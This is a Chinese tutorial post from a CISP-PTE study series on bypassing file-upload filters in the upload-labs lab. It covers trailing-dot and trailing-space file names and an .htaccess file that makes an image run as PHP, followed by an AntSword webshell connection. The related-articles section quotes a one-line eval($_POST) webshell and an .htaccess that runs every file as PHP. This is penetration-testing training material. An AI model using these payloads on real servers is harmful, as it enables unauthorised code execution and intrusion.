网安入门13-文件上传(htaccess,其他绕过)

这篇具有很好参考价值的文章主要介绍了网安入门13-文件上传(htaccess,其他绕过)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

空格绕过,点号绕过

Pass-07
直接上传肯定是失败的
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络

把文件名1.php改成1.php.或1.php_(下划线为空格),这种命名方式在windows系统里是不被允许的,所以需要在burp之类里进行修改,然后绕过验证后,会被windows系统自动去掉后面的点和空格,但要注意Unix/Linux系统没有这个特性。

在php后加一个空格
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络
Pass-08
在php后加一个点
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络

Htaccess绕过

htaccess文件是一个用于Apache Web服务器的配置文件。它允许在不修改主服务器配置文件的情况下,对单个目录(及其子目录)进行配置。这种方式使得网站管理员可以对特定目录应用特定的设置,例如URL重写、访问控制、MIME类型等。

htaccess的主要功能包括:

  1. 重定向和URL重写:可以将旧的URL重定向到新的URL,或者实现更友好的URL结构。
  2. 访问控制:可以限制特定IP地址或用户代理访问网站,或者要求用户提供用户名和密码才能访问某些目录。
  3. 自定义错误页面:可以为特定的HTTP错误代码(如404页面未找到)设置自定义错误页面。
  4. MIME类型:可以为特定文件扩展名定义MIME类型,以便正确地传输文件内容。

简单理解就是我们自己更改了对方服务器的一个“规定“这里拿来进行绕过上传的防御规则,如下图,第三步还有第四步的顺序可以更换
htaccess1:

#define width 1337
#define height 1337
<FilesMatch "123pinfo.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
  1. 这里的htaccess文件的意思就是将123 pinfo.jpg按php来进行解析
  2. 构造好.htaccess文件后,将其改名为.htaccess。
  3. 先上传123 pinfo.jpg文件
  4. 再上传.htaccess文件
  5. 再去访问123 pinfo.jpg即可得到phpinfo页面

Pass-04

先上传一个基础的图片马
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络
测试访问没问题
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络再上传一个.htaccess文件,抓包改一下Content-Type
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络
由于是服务器内部配置文件,直接访问肯定是403Forbidden
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络
神奇的事情发生了,再去访问我们的图片马,已经按照php解析了
网安入门13-文件上传(htaccess,其他绕过),CISP-PTE备考之路,安全,web安全,网络
最后我们蚁剑一连接即可

文章来源地址https://www.toymoban.com/news/detail-815464.html

到了这里,关于网安入门13-文件上传(htaccess,其他绕过)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CTFhub-文件上传-.htaccess

    首先上传 .htaccess 的文件 .htaccess SetHandler application/x-httpd-php 这段内容的作用是使所有的文件都会被解析为php文件 然后上传1.jpg 的文件   内容为一句话木马 1.jpg ?php echo \\\"PHP Loaded\\\"; eval(@$_POST[\\\'a\\\']); ? 用蚁剑连接 http://challenge-e3884f63b3d65683.sandbox.ctfhub.com:10800/upload/1.jpg

    2024年02月10日
    浏览(34)
  • 文件上传 .htaccess 与.user.ini

    1使用方法,上传.htaccess文件内容如下 或者 2再上传shell.jpg 3访问shell.jpg文件 方式使用限制,在上传的目录中必须包含php文件,例如index.php 1上传.user.ini文件,内容为: 加载1.gif文件 2上传1.gif文件 3 访问同目录中的php文件,例如index.php ,先通过本目录中的配置文件.user.ini进行

    2024年02月09日
    浏览(42)
  • 文件上传漏洞基础/::$DATA绕过上传/叠加特征绕过/双写绕过

    如果后缀名没有对::$DATA进行判断,利用windows系统NTFS特征可以绕过上传 在window的时候如果文件名+\\\"::$DATA\\\"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,其实和空格绕过点绕过类似 upload-pass08 代码分析 看到这里还是黑名单过滤,比前面少了

    2024年02月06日
    浏览(47)
  • 文件上传漏洞(1), 文件上传绕过原理

    一, 前端校验上传文件 添加 Javascript 代码,然后在 form 表单中 添加 onsubmit=\\\"returb checkFile()\\\" 绕过前端: 1. 在浏览器设置中禁用js 通常不建议使用这种方式, 因为前端js中可能存在很多其他js的功能, 例如ajax请求. 2. 用burpsuite等工具修改请求. 因为前端js对文件类型做了限制, 那么将

    2024年02月08日
    浏览(47)
  • 文件上传-绕过文件类型

            小伙伴们大家好!本期为大家带来的文件上传漏洞之绕过文件类型。 目录 原理 Content-Type PHP代码如何获取上传文件的类型 实战演示 1、测试网站的功能是否正常 2、尝试上传webshell 3、使用连接工具连接webshell  总结         当我们上传文件的时候,不仅前端要检

    2024年02月11日
    浏览(40)
  • 文件上传漏洞(2), 文件上传实战绕过思路, 基础篇

    准备一句话木马文件 mm.php 一, 前端绕过 p1 浏览器禁用js 先把 mm.php 后缀名修改为 mm.jpg , 点击提交后, 用 burp 截取请求, 将数据包中的文件名修改回 mm.php 再提交. 二, 类型MIME绕过 p2 使用 burp 修改 Content-Type: image/jpeg 三, 黑名单绕过 p3 后端禁止上传.asp|.aspx|.php|.jsp后缀文件. apac

    2024年02月08日
    浏览(51)
  • 【文件上传漏洞绕过方式】

    目录 前言 正文 总结   目前,文件上传往往在业务中不可避免,也是极其容易出现上传漏洞。根据owasptop10中的排名,文件上传漏洞(属于攻击检测和防范不足)高居其中。今天和大家分享常见的文件上传的绕过方式。  绕过方式一:前端绕过  首先,根据前端页面队上传文

    2023年04月08日
    浏览(51)
  • 文件上传常用绕过方式

    JavaScript 验证就是所谓的客户端验证,也是最脆弱的一种验证。直接修改数据包或禁用 JavaScript.enable 即可绕过。 例如upload的第一题,在我们点击发送时,还没经过代理就直接弹窗报错,就考虑存在前端验证 我们只需要将前端验证的布尔值改为false,重新加载后就能绕过前端验

    2024年02月13日
    浏览(29)
  • 文件上传验证常见的绕过方式!

    目前,文件上传在公司项目中是非常常见的一项业务,但极其容易出现上传漏洞。根据owasptop10中的排名,文件上传漏洞(属于攻击检测和防范不足)高居其中。今天给大家总结一下文件上传验证的绕过方式,以下是详细的内容: 1、JavaScript验证绕过 JavaScript验证就是所谓的客户

    2024年02月14日
    浏览(34)
  • 【网络安全】文件上传绕过思路

    分享一些文件上传绕过的思路,下文内容多包含实战图片,所以打码会非常严重,可多看文字表达;本文仅用于交流学习, 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 一次项目渗透时,

    2023年04月21日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包